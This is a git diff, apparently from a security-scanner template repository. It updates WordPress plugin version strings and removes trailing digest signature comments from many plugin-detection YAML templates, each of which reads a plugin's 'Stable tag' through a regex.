a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 0e80dcd62e..983b22c65d 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.54.0 \ No newline at end of file +4.55.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt index 83364075e0..3bff059174 100644 --- a/helpers/wordpress/plugins/mainwp-child.txt +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -1 +1 @@ -5.1 \ No newline at end of file +5.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index 45d2c23337..ab374850bf 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.90.0 \ No newline at end of file +3.90.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 01129dc3ec..2eb8a04cb5 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.4.3 \ No newline at end of file +8.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 8c1da59dbb..b916322161 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.8.5 \ No newline at end of file +3.8.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 83cf670a19..f0ad3287f9 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.6.2 \ No newline at end of file +9.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/simple-history.txt b/helpers/wordpress/plugins/simple-history.txt index 682895218b..2c9aebff95 100644 --- a/helpers/wordpress/plugins/simple-history.txt +++ b/helpers/wordpress/plugins/simple-history.txt @@ -1 +1 @@ -4.15.1 \ No newline at end of file +4.16.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sucuri-scanner.txt b/helpers/wordpress/plugins/sucuri-scanner.txt index 4f45dc20d1..ee672d89ab 100644 --- a/helpers/wordpress/plugins/sucuri-scanner.txt +++ b/helpers/wordpress/plugins/sucuri-scanner.txt @@ -1 +1 @@ -1.8.44 \ No newline at end of file +1.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index a95dd7ef69..0d5df2ef83 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.9.5 \ No newline at end of file +1.8.9.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index a507a6762a..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1b81f8f99ad55b560dc2f891eef529855c46e93bcb26611e8361b9400372ac9022100aec746fa40c9efeddfc7439c2f154a22df8fb793a2543f9df8399069e028a300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 314b5c4c97..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bab30c9cb38699addf360828ccb10dec7df2f2d96fe37b3bea1151a1149ead68022100ba5bb5ef722daf501e054791833625fb2ba4403f16c5b8068d37c17ecec9aaff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 386cea8171..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f672e45ac65c8d90849d9793acc5aff780b47efb6a29293ab2262405f013be7022007d4b677a87f14355251fbcb6afa9e2eb52d0a5d7a5b07de9cc1b9f7c9ceed76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 92ffa0675a..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b7f2b30dec6ee342586ed333438ce3587f820d8af2f7f260a870fdda84a98cf022100a408a03bd95a4a57fceba937af2644bc252829c5442bd663c88452ae3fb67374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 2593a74c35..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017c2832d99c14709b83dbba8b481843b63c3e6b63c32edbe0f3399d6620e8796022100e565e94358ed0edfc9d6febd4876ac0c21fa88623eea41c83bae5c9fe0b55feb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index dd98f79253..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201a17e1d427645c45bdba424e8142e0086e2825ec635168a770c3b63fb0f3db5102201ff06030cd7bff99406b43771507863b7535767fedd51d444d6dae2d94ff584b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 5c69b16dc5..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009855ca9cfbef0b90d05c9e318d6651f602c369a4d12fc5979c16711191d7857a022047d0346885fb6185b1e0319855abfeca6fd37f3cf78234e90eea7ee0f69ff39b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 99ae3c0fb6..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100912f7927a6325615ac506e0e72f1d13ceb196bbf99cec0daff2274ebceedb2e002203dcdd8a6b992ab1efc31ab5a6c07563ef17cbac0b5a4aba4191658ae02583fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index f416e413c6..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f92e789c8329e8132fd7c6cc83cd6e7adf19f58ebf8868590418eb8e6a17eb19022100b987f096391b8a41bd3dfc2bd9abfa0bd3f7e891a1ddb6898cfaed4085a67e8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 4eab9b61d4..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b93f0efcd936ae747f465002df7e860b127fc257d612efd97a8d003f6d3d712022100a4a08ee7ef065169a8e1e4c8dff71432c797a1010bdd523a62f7cb3abfc6bc63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 3f2799d865..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d13db1a93ffa3cce9972f31ef0d5da2f96dd3036504d444af5e3d367cd61afe0221009e77584fb5fe674a0c28c7b45221969c87be53e8542a5d8ac280dcc62cccdfad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index be32000168..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220799a67fe57b5c4a874133a228119141b65927ad9f4e5e64d3f5b7bf70cef7a02022100ca463dc0c68f265f2b4883872f5006a26bd033ef77c545dfa642d6bffc758729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 5f15e6a5af..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043021f4183e9d754855e6faf86b570ecbc3a1f8d36e432440d2e8b1beda3062c5fd5022016f6b3e52721154f19ec5643539bf91314bbd55308c59abba6ac17bb7b1e4254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 517bc931be..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220093e70976a3fd5755d2af6758adc8e9efa54dc4e8c6ac502aaf57c9f63966deb022100dfa06decbc018368c991e2873334efe12467c4660d2ef6a9fbb704be83cb1e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 00eec9947c..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b7cdec71c5d0dff3641789276ea334795561c04ab44aca775e4aa5e1f3fbd6302207be5d695428b69d96f3e331ff2c05c4df7baa7f28ebecb93019cb230d4ab3edc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 89d12e0438..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207afc2f2adedf26285b194b90675906dae63aa3d06a5958cb873c2633fef8320c022100e2c62898c0ee6cef9f48fb0c824abc4f49795a744f309e02c1ed3d0dde08a6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 0494305bc9..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5778b054954e22ba541db93ca3634794815de57d8edc3eddba0f20ecf4a6b3c02205630dcf1c281c909ad8aac35985bc96fbe8c153d096aa39cae33514377064083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index af13d021ae..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c8999d4396b34a2e565536afaa43a0ef6025c2fb1a1ccd0ac9a97540afd04860220013ffea4c783598a788536e5ebdc5e87480fb3b821fcd12e1a8a90ef847d758d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 1f108078bd..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b31c973705b9ca065b738c800c2ebfff149e0bb533baa5babbab38971da65f802206273c17e5c762f1e2c91adf454fe9108d21fd83cd055d57f4022c7c99f3291f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 7f98ca5aac..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016413e8b7d006e1440f49674f9ca01173a6790844185acdcbb65e9096869bb7c02200874dabae31aa1f99857262f37fcd90ddeb84f8765d46cc46b95544ed5a4cb78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 4113623f95..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023e517ea8294606a610bd2a768297497b33a750cb180859b201331bbcec995f1022074d013740e6b3f8ef3ae1e46a78d8eca5d4aabb03e615a45abdfce39bcf91fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 14d079288d..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a642d7e482ad846e69be24d719e06ec7be8eba77ec2a5aed763b658db73fcc33022030e60e6f32cf28fb7447b7977f5b73b508507c90b29e3807a39c8b59cd9b46a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 92fe187ca9..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f00df574868624812df9c706c4997da8ebf961760e7eadbb51889929fc31af60220734216b76d367171a21d0aaa7ac9ce2c4ef70503c34b5a799546051b317db7de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 938ab503af..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa1e0c394c7e4dd643d87ffb0f2c308cc523b0cf2510a39f9b809a7f70555ca0022100eb96be6d985dbd366ff7f1a005c25f4d894b521368005fe572cde359305b81cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4ecacb1ff4..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd1797f94ac92c06e2c376b0fe9e1ffbcee0ee19410b60d71b2d6f626f29f20c022037ae02d30745842258984cb0a5b9d9cf202ab6814ffe70f512f282019b3789d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 22a3b18d54..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009358acc60bc6fbcacde1bbb504a5f66fc9b9aa120ddd6209fdc0ff21ddcd414402204cbc9ac83321426651197104c63aa2f5a2f7078fcc418cd2d16380cf51319269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 4343115807..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1f54c43ca1ff173c3f2bf88709fe22919289c8d02658d3c6f4d3bffdaded47f022100d770859e9f6570208a07efbdd8d47cf9b25bf9944bfb96ed0642e6f4f9ec8f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index fc10839c43..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066554eaf453f3fe9343901b03bea1e1736f9e2888a035d962c44592057058cf902207717f244909a32407990497408f9ea748b2ca37076f08924b6e2d7cc850ed15c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8f24ef6c6..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8129def4f322736a925a1d0aec3f4e931b44c039a335f4b43fd4a08b79d7548022100d11744290010cfef23f32a53ed02a45b19b1cecac99963b3a804de5ecb4fac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 517c4059c7..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2770f709ef53f51be64046e2c8aa2292ac0dd4af8a269528113c474ae4e31e9022100f945cda11fe4ab1bd859eef4ad9aa4adf7e061db9736cdbf377774de066a6c16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index a3c59294f4..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e6ff8b512de2a41e00d67354e085b3341202934874442828d9861a0e921d527022100efb37992ba2b7436758010a77aae254c8ad711b40ccd66bd31b8f70b079da014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1dc572e501..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5e2b655d0ee6c9066d70c7eb767b4e42baf277f3a45570a60f1d33e4b247199022100a847e32d99a9cfce790ca243816462cfad55e3d767d58e328a8aea0391a60900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 424f9d03fe..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203927b8d688133b68dec6fc57bdfff6e5a1619af7925fddc90f8a77c7e89baecd022100fcc86bed2c04b07bbdac052e0dc1b2e9c379c42826c2fabd9839f449a8290029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 761f8bc523..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d972c34f9b0ceba250618bc402a81baa8813bf8eebe32eedfe2da7958c19ca7022100b2777914ed24e4cc296932c6348eadb558e7f43e87137bb212f43317fb14515a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 318b7fbf71..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100941e81eca8a035c8c7f760027500a96c958abd87a953ec7e9ec892bb7fe14f2b02207cff2fff5cb70d0df02847b0f3c73d34928fc4ddf2d3aba74b04f1b96f7d7fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 68533344b9..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7c49ce473fe3c7d2f8485e2fbe5cbeed1d6f91ce4bb6f7fcf053459f671ac0c02202248520fe8da4ddfce819c06009e0a90c4c8cba1e4db8cacf5add83ade277d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 374875adf9..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a413fc22ea5a51e87384ae6d922daf84cc41df0b31f60bc509f4a200b4fcf785022023fdbd3d9bc848e93ad6a44955b6de458216c44cbf6ff1bc72a9f9c32ddcc4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 72d53c149b..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e1fbe540038966b984f1b568937fb1a3f7853f7d98fc0514beebbcfb363a99b022100a19ca0747afb98ecd926f2fdc0b08cd1f13ebda1c9129fadb5e898104189a599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 4b5cfb54e3..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016383c0a6ad4f22dada06af18e310442467f8345559b73d3953884fd6cf8835f022007c191d61d73240344c8b9c563b64bf85f248d0df8d53faba640600658f6291b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 9dfaea498d..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220318d095910cbbe370ce81ed9d5cac22aba5b75de54e7fb417d43b7ec46b49770022100b62ff76be0e817d883f7bc0a4828cdbffeb01fde8b4517517d15c76034081dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index e45c166b4d..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c60b5fcccdd6aad52bbae17135e1dacb69e569d945c749677d69fd874e2df237022100d263f0daba36caf7c2cf20aca507eaeae1f1959a393b52a9b37cd2ec22e79a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 7916148fe1..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045a618e4fe6aa55b1517504a2b8f9c78a4e8fce8fc2150bd3958dc1f7a7ca6c602210085c760efa4a19a1830da5a8aedc7cb446a2c92057741b9b7b0c1f5be85f64771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6d25b1f2c9..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml 